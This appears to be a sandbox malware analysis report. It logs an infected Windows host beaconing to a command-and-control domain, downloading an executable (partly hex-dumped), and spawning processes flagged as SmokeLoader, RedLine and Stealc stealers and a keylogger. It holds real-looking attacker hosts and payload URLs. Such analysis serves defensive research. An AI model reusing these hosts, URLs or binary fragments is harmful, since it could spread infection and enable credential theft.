                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 272
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:39.700280905 CEST272OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 75 40 ce 93
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuu@KojbI5Fk2aV-#52E#*7EKx1G6![ 4<qa;A<?ExxDAjb"K_3
                                              Sep 2, 2024 11:45:40.635361910 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.449787102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:45.315229893 CEST271OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://jlbunmblotwunq.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 360
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:45.315428019 CEST360OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 5f a8 8e
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vun_uTyV79Vt/k]~o@HVM"_+9'$vD,o0+_w+L|72WiEf(]kfY&
                                              Sep 2, 2024 11:45:46.244891882 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:46 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.449788102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:50.538408995 CEST272OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://vfaiilfonqsqudx.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 118
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:50.538423061 CEST118OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 14 fd 9a
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu"HWqt7gJ/%3$,[
                                              Sep 2, 2024 11:45:51.472450018 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:51 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.449789102.189.104.201802580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 2, 2024 11:45:56.311129093 CEST270OUTPOST /tmp/ HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://qjqwiddoadvtn.com/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 260
                                              Host: epohe.ru
                                              Sep 2, 2024 11:45:56.311152935 CEST260OUTData Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 32 c9 ab
                                              Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuy2[Rv8d+kbXiZ.3?-PF{%m?x.K<Cp'aT!9?O(zLUvv E/8
                                              Sep 2, 2024 11:45:57.212954998 CEST151INHTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Mon, 02 Sep 2024 09:45:57 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 03 00 00 00 72 e8 84
                                              Data Ascii: r


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449763191.96.144.1574432580C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-02 09:42:52 UTC192OUTGET /Coin.exe HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Host: www.darkviolet-alpaca-923878.hostingersite.com
                                              2024-09-02 09:42:52 UTC533INHTTP/1.1 200 OK
                                              Server: hcdn
                                              Date: Mon, 02 Sep 2024 09:42:52 GMT
                                              Content-Type: application/x-executable
                                              Content-Length: 3639176
                                              Connection: close
                                              last-modified: Sun, 01 Sep 2024 09:33:03 GMT
                                              etag: "378788-66d434cf-b3fea62b77a48d21;;;"
                                              platform: hostinger
                                              panel: hpanel
                                              content-security-policy: upgrade-insecure-requests
                                              x-turbo-charged-by: LiteSpeed
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 6e9f1bd55434189bbb983139904ac3c1-bos-edge3
                                              x-hcdn-cache-status: MISS
                                              x-hcdn-upstream-rt: 0.011
                                              Accept-Ranges: bytes
                                              2024-09-02 09:42:52 UTC836INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZP@!L!This program must be run under Win32$7
                                              2024-09-02 09:42:52 UTC1369INData Raw: 00 d0 37 00 00 00 00 00 00 66 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 00 00 00 00 ff 00 00 00 90 40 10 40 00 01 07 49
                                              Data Ascii: 7f7@P@Boolean@FalseTrue@,@Char@@I
                                              2024-09-02 09:42:52 UTC1369INData Raw: e8 56 ff ff ff 84 c0 75 04 33 c0 89 06 5a 5d 5f 5e 5b c3 53 56 57 55 83 c4 f8 8b d8 8b fb 8b 32 8b 43 08 3b f0 72 70 8b ce 03 4a 04 8b e8 03 6b 0c 3b cd 77 62 3b f0 75 1b 8b 42 04 01 43 08 8b 42 04 29 43 0c 83 7b 0c 00 75 48 8b c3 e8 39 ff ff ff eb 3f 8b ce 8b 7a 04 03 cf 8b e8 03 6b 0c 3b cd 75 05 29 7b 0c eb 2a 8b 0a 03 4a 04 89 0c 24 8b 7b 08 03 7b 0c 2b f9 89 7c 24 04 2b f0 89 73 0c 8b d4 8b c3 e8 d0 fe ff ff 84 c0 75 04 33 c0 eb 0c b0 01 eb 08 8b 1b 3b fb 75 81 33 c0 59 5a 5d 5f 5e 5b c3 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00 00 81 e6 00 00 ff ff 89 73 04 6a 01 68 00 20 00 00 56 6a 00 e8 f8 fd ff ff 8b f8 89 3b 85 ff 74 23 8b d3 b8 ec 85 45 00 e8 6c fe ff ff 84 c0 75 13 68 00 80 00 00 6a 00 8b 03 50 e8 d9
                                              Data Ascii: Vu3Z]_^[SVWU2C;rpJk;wb;uBCB)C{uH9?zk;u){*J${{+|$+su3;u3YZ]_^[SVW}sjh Vj;t#EluhjP
                                              2024-09-02 09:42:52 UTC1369INData Raw: 26 fc ff ff 8b 44 24 0c 89 44 24 04 8b 44 24 10 89 44 24 08 83 7c 24 04 00 74 14 8d 54 24 04 b8 fc 85 45 00 e8 91 fa ff ff eb 04 33 c0 89 07 83 c4 14 5f 5e 5b c3 55 8b ec 33 d2 55 68 e2 1a 40 00 64 ff 32 64 89 22 68 cc 85 45 00 e8 39 f9 ff ff 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 2e f9 ff ff b8 ec 85 45 00 e8 8c f9 ff ff b8 fc 85 45 00 e8 82 f9 ff ff b8 28 86 45 00 e8 78 f9 ff ff 68 f8 0f 00 00 6a 00 e8 dc f8 ff ff a3 24 86 45 00 83 3d 24 86 45 00 00 74 2f b8 03 00 00 00 8b 15 24 86 45 00 33 c9 89 4c 82 f4 40 3d 01 04 00 00 75 ec b8 0c 86 45 00 89 40 04 89 00 a3 18 86 45 00 c6 05 c4 85 45 00 01 33 c0 5a 59 59 64 89 10 68 e9 1a 40 00 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 af f8 ff ff c3 e9 71 1d 00 00 eb e5 a0 c4 85 45 00 5d c3 55 8b ec 53 80
                                              Data Ascii: &D$D$D$D$|$tT$E3_^[U3Uh@d2d"hE9=MEthE.EE(Exhj$E=$Et/$E3L@=uE@EE3ZYYdh@=MEthEqE]US
                                              2024-09-02 09:42:52 UTC1369INData Raw: 47 04 8b f3 03 74 24 0c 3b c6 73 08 e8 f0 fd ff ff 01 47 04 8b 07 03 47 04 3b f0 75 11 83 e8 04 ba 04 00 00 00 e8 eb fc ff ff 83 6f 04 04 8b 07 a3 20 86 45 00 8b 47 04 a3 1c 86 45 00 b0 01 83 c4 10 5f 5e 5b c3 8d 40 00 53 83 c4 f8 8b d8 8b d4 8d 43 04 e8 44 f8 ff ff 83 3c 24 00 74 0b 8b c4 e8 57 ff ff ff 84 c0 75 04 33 c0 eb 02 b0 01 59 5a 5b c3 90 53 56 83 c4 f8 8b f2 8b d8 8b cc 8d 56 04 8b c3 e8 a3 f8 ff ff 83 3c 24 00 74 0b 8b c4 e8 26 ff ff ff 84 c0 75 04 33 c0 eb 02 b0 01 59 5a 5e 5b c3 8d 40 00 33 d2 85 c0 79 03 83 c0 03 c1 f8 02 3d 00 04 00 00 7f 16 8b 15 24 86 45 00 8b 54 82 f4 85 d2 75 08 40 3d 01 04 00 00 75 ea 8b c2 c3 53 56 57 55 8b f0 bf 18 86 45 00 bd 1c 86 45 00 8b 1d 10 86 45 00 3b 73 08 0f 8e 84 00 00 00 8b 1f 8b 43 08 3b f0 7e 7b 89 73
                                              Data Ascii: Gt$;sGG;uo EGE_^[@SCD<$tWu3YZ[SVV<$t&u3YZ^[@3y=$ETu@=uSVWUEEE;sC;~{s
                                              2024-09-02 09:42:52 UTC1369INData Raw: 05 1c 86 45 00 83 3d 1c 86 45 00 0c 0f 8d 4c 01 00 00 8b 04 24 01 05 20 86 45 00 8b 04 24 29 05 1c 86 45 00 8b f7 e9 33 01 00 00 8b d8 f6 03 02 75 0d 8b c3 8b 50 08 01 14 24 e8 e9 f6 ff ff 83 3c 24 0c 7c 1b 8b dd 03 de 8b 04 24 83 c8 02 89 03 8b c3 83 c0 04 e8 91 f7 ff ff e9 fe 00 00 00 8b f7 e9 f7 00 00 00 8b c6 2b c7 89 44 24 04 3b 1d 20 86 45 00 75 67 a1 1c 86 45 00 3b 44 24 04 7c 53 8b 44 24 04 29 05 1c 86 45 00 8b 44 24 04 01 05 20 86 45 00 83 3d 1c 86 45 00 0c 7d 18 a1 1c 86 45 00 01 05 20 86 45 00 03 35 1c 86 45 00 33 c0 a3 1c 86 45 00 8b c6 2b c7 01 05 b8 85 45 00 8b 45 00 25 03 00 00 80 0b f0 89 75 00 b0 01 e9 a2 00 00 00 e8 3e f9 ff ff 8b dd 03 df f6 03 02 75 4d 8b d3 8b c2 8b 48 08 89 0c 24 8b 0c 24 3b 4c 24 04 7d 0e 03 14 24 8b da 8b 04 24 29
                                              Data Ascii: E=EL$ E$)E3uP$<$|$+D$; EugE;D$|SD$)ED$ E=E}E E5E3E+EE%u>uMH$$;L$}$$)
                                              2024-09-02 09:42:52 UTC1369INData Raw: 6f fe ff ff eb 12 81 fb 50 80 45 00 74 0a b8 67 00 00 00 e8 5b fe ff ff 8b c6 5e 5b c3 8b c0 53 8a 1a 3a cb 76 02 8b cb 88 08 42 40 81 e1 ff 00 00 00 92 e8 af fe ff ff 5b c3 90 53 56 57 89 c6 89 d7 31 c0 31 d2 8a 06 8a 17 46 47 29 d0 77 02 01 c2 52 c1 ea 02 74 26 8b 0e 8b 1f 39 d9 75 44 4a 74 15 8b 4e 04 8b 5f 04 39 d9 75 37 83 c6 08 83 c7 08 4a 75 e2 eb 06 83 c6 04 83 c7 04 5a 83 e2 03 74 1c 8a 0e 3a 0f 75 2f 4a 74 13 8a 4e 01 3a 4f 01 75 24 4a 74 08 8a 4e 02 3a 4f 02 75 19 01 c0 eb 15 5a 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a
                                              Data Ascii: oPEtg[^[S:vB@[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0Nt
                                              2024-09-02 09:42:52 UTC1369INData Raw: 8b c0 53 33 db 6a 00 e8 ee ff ff ff 83 f8 07 75 1c 6a 01 e8 e2 ff ff ff 25 00 ff 00 00 3d 00 0d 00 00 74 07 3d 00 04 00 00 75 02 b3 01 8b c3 5b c3 90 55 8b ec 83 c4 f4 0f b7 05 20 60 45 00 89 45 f8 8d 45 fc 50 6a 01 6a 00 68 24 30 40 00 68 02 00 00 80 e8 31 e3 ff ff 85 c0 75 4d 33 c0 55 68 fd 2f 40 00 64 ff 30 64 89 20 c7 45 f4 04 00 00 00 8d 45 f4 50 8d 45 f8 50 6a 00 6a 00 68 40 30 40 00 8b 45 fc 50 e8 06 e3 ff ff 33 c0 5a 59 59 64 89 10 68 04 30 40 00 8b 45 fc 50 e8 e0 e2 ff ff c3 e9 56 08 00 00 eb ef 66 a1 20 60 45 00 66 25 c0 ff 66 8b 55 f8 66 83 e2 3f 66 0b c2 66 a3 20 60 45 00 8b e5 5d c3 00 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 00 00 00 00 db e3 9b d9 2d 20 60 45 00
                                              Data Ascii: S3juj%=t=u[U `EEEPjjh$0@h1uM3Uh/@d0d EEPEPjjh@0@EP3ZYYdh0@EPVf `Ef%fUf?ff `E]SOFTWARE\Borland\Delphi\RTLFPUMaskValue- `E
                                              2024-09-02 09:42:52 UTC1369INData Raw: 0e ff 15 14 80 45 00 c3 90 80 3d 28 60 45 00 00 74 17 50 50 52 54 6a 02 6a 00 68 e4 fa ed 0e ff 15 14 80 45 00 83 c4 08 58 c3 8d 40 00 54 6a 01 6a 00 68 e0 fa ed 0e ff 15 14 80 45 00 83 c4 04 58 c3 8d 40 00 80 3d 28 60 45 00 01 76 09 50 ff 73 04 e9 d6 ff ff ff c3 90 80 3d 28 60 45 00 01 76 07 50 53 e9 c4 ff ff ff c3 8d 40 00 85 c9 74 19 8b 41 01 80 39 e9 74 0c 80 39 eb 75 0c 0f be c0 41 41 eb 03 83 c1 05 01 c1 c3 8b c0 80 3d 28 60 45 00 01 76 1d 50 52 51 e8 cf ff ff ff 51 54 6a 01 6a 00 68 e1 fa ed 0e ff 15 14 80 45 00 59 59 5a 58 c3 90 80 3d 28 60 45 00 01 76 12 52 54 6a 01 6a 00 68 e2 fa ed 0e ff 15 14 80 45 00 5a c3 50 52 80 3d 28 60 45 00 01 76 10 54 6a 02 6a 00 68 e3 fa ed 0e ff 15 14 80 45 00 5a 58 c3 8b c0 8b 44 24 04 f7 40 04 06 00 00 00 0f 85 13
                                              Data Ascii: E=(`EtPPRTjjhEX@TjjhEX@=(`EvPs=(`EvPS@tA9t9uAA=(`EvPRQQTjjhEYYZX=(`EvRTjjhEZPR=(`EvTjjhEZXD$@
                                              2024-09-02 09:42:52 UTC1369INData Raw: 77 0f 8d 44 24 04 50 e8 24 d8 ff ff 83 f8 00 74 71 8b 44 24 04 fc e8 29 f6 ff ff 8b 54 24 08 6a 00 50 68 3a 3a 40 00 52 ff 15 18 80 45 00 8b 5c 24 04 81 3b de fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 10 80 45 00 85 d2 0f 84 fa fe ff ff 89 d8 ff d2 85 c0 0f 84 ee fe ff ff 8b 53 0c e8 16 fb ff ff 8b 0d 04 80 45 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 ba 03 00 00 31 c0 c3 8d 40 00 31 d2 8d 45 f4 64 8b 0a 64 89 02 89 08 c7 40 04 f4 39 40 00 89 68 08 a3 3c 86 45 00 c3 8d 40 00 31 d2 a1 3c 86 45 00 85 c0 74 1c 64 8b 0a 39 c8 75 08 8b 00 64 89 02 c3 8b 09 83 f9 ff 74 08 39 01 75 f5 8b 00 89 01 c3 55 8b ec 53 56 57 bf 38 86 45 00 8b 47 08 85 c0 74 48 8b 5f 0c 8b 70 04 33 d2 55 68 22 3b 40 00 64 ff 32 64 89 22 85 db 7e 12 4b 89 5f 0c 8b
                                              Data Ascii: wD$P$tqD$)T$jPh::@RE\$;SCtESEtL$Q$1@1Edd@9@h<E@1<Etd9udt9uUSVW8EGtH_p3Uh";@d2d"~K_


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:05:41:54
                                              Start date:02/09/2024
                                              Path:C:\Users\user\Desktop\e0OOofAl0S.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\e0OOofAl0S.exe"
                                              Imagebase:0x400000
                                              File size:221'696 bytes
                                              MD5 hash:BDAEB131CAED57083370B0C24ED030EB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:05:42:05
                                              Start date:02/09/2024
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff72b770000
                                              File size:5'141'208 bytes
                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:5
                                              Start time:05:42:24
                                              Start date:02/09/2024
                                              Path:C:\Users\user\AppData\Roaming\busaafd
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\busaafd
                                              Imagebase:0x400000
                                              File size:221'696 bytes
                                              MD5 hash:BDAEB131CAED57083370B0C24ED030EB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:7
                                              Start time:05:42:54
                                              Start date:02/09/2024
                                              Path:C:\Users\user\AppData\Local\Temp\D931.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\D931.exe
                                              Imagebase:0x400000
                                              File size:3'639'176 bytes
                                              MD5 hash:17D51083CCB2B20074B1DC2CAC5BEA36
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 38%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:8
                                              Start time:05:42:59
                                              Start date:02/09/2024
                                              Path:C:\Users\user\AppData\Local\Temp\svchost015.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\svchost015.exe
                                              Imagebase:0x400000
                                              File size:2'990'472 bytes
                                              MD5 hash:B826DD92D78EA2526E465A34324EBEEA
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 4%, ReversingLabs
                                              Reputation:moderate
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:9.3%
                                                Dynamic/Decrypted Code Coverage:22.6%
                                                Signature Coverage:38.2%
                                                Total number of Nodes:212
                                                Total number of Limit Nodes:5
                                                execution_graph 3612 41ab40 3615 41a7a0 3612->3615 3614 41ab45 3616 41a7d3 3615->3616 3617 41a844 6 API calls 3616->3617 3626 41a955 3616->3626 3618 41a8ad 6 API calls 3617->3618 3620 41a922 GetUserDefaultLangID 3618->3620 3619 41a987 GetSystemTimes 3621 41a9ab 3619->3621 3619->3626 3622 41a931 RtlLeaveCriticalSection 3620->3622 3623 41a93c 3620->3623 3624 41a9a9 3621->3624 3625 41a9b4 FoldStringW 3621->3625 3622->3623 3623->3626 3627 41a945 LoadLibraryA 3623->3627 3628 41aa3a GlobalAlloc 3624->3628 3629 41a9ce GetConsoleAliasesLengthA CallNamedPipeA GetComputerNameA GetConsoleAliasExesLengthW 3624->3629 3625->3624 3626->3619 3626->3624 3627->3626 3630 41aa57 3628->3630 3631 41aa8c LoadLibraryW 3628->3631 3637 41aa04 3629->3637 3630->3631 3641 41a5c0 VirtualProtect 3631->3641 3634 41aa9c 3642 41a730 3634->3642 3636 41aab9 GlobalSize 3638 41aaa1 3636->3638 3637->3628 3638->3636 3639 41aae3 InterlockedDecrement 3638->3639 3640 41aaf7 3638->3640 3639->3638 3640->3614 3641->3634 3643 41a752 3642->3643 3644 41a746 QueryDosDeviceW 3642->3644 3653 41a630 3643->3653 3644->3643 3647 41a765 FreeEnvironmentStringsW 3648 41a76d 3647->3648 3656 41a670 3648->3656 3651 41a784 RtlAllocateHeap GetNumaHighestNodeNumber 3652 41a798 3651->3652 3652->3638 3654 41a647 GetStartupInfoA LoadLibraryA 3653->3654 3655 41a659 3653->3655 3654->3655 3655->3647 3655->3648 3657 41a694 WritePrivateProfileStringA UnhandledExceptionFilter 3656->3657 3660 41a6aa 3656->3660 3657->3660 3658 41a702 3658->3651 3658->3652 3660->3658 3661 41a6e9 GetComputerNameW 3660->3661 3662 41a660 3660->3662 3661->3660 3665 41a5f0 3662->3665 3666 41a619 3665->3666 3667 41a60c FindNextChangeNotification 3665->3667 3666->3660 3667->3666 3902 40b187 3903 40b193 3902->3903 3908 40b19b 3903->3908 3910 40b488 3903->3910 3907 40b216 3923 40b243 3907->3923 3912 40b494 3910->3912 3911 40b4f3 RtlEnterCriticalSection 3913 40b202 3911->3913 3914 40b4dc ___lock_fhandle 3912->3914 3915 40b4c9 InitializeCriticalSectionAndSpinCount 3912->3915 3913->3907 3916 40b0eb 3913->3916 3914->3911 3914->3913 3915->3914 3920 40b0fb __lseeki64_nolock 3916->3920 3917 40b151 3926 40b399 3917->3926 3920->3917 3921 40b13b CloseHandle 3920->3921 3921->3917 3922 40b147 GetLastError 3921->3922 3922->3917 3930 40b527 RtlLeaveCriticalSection 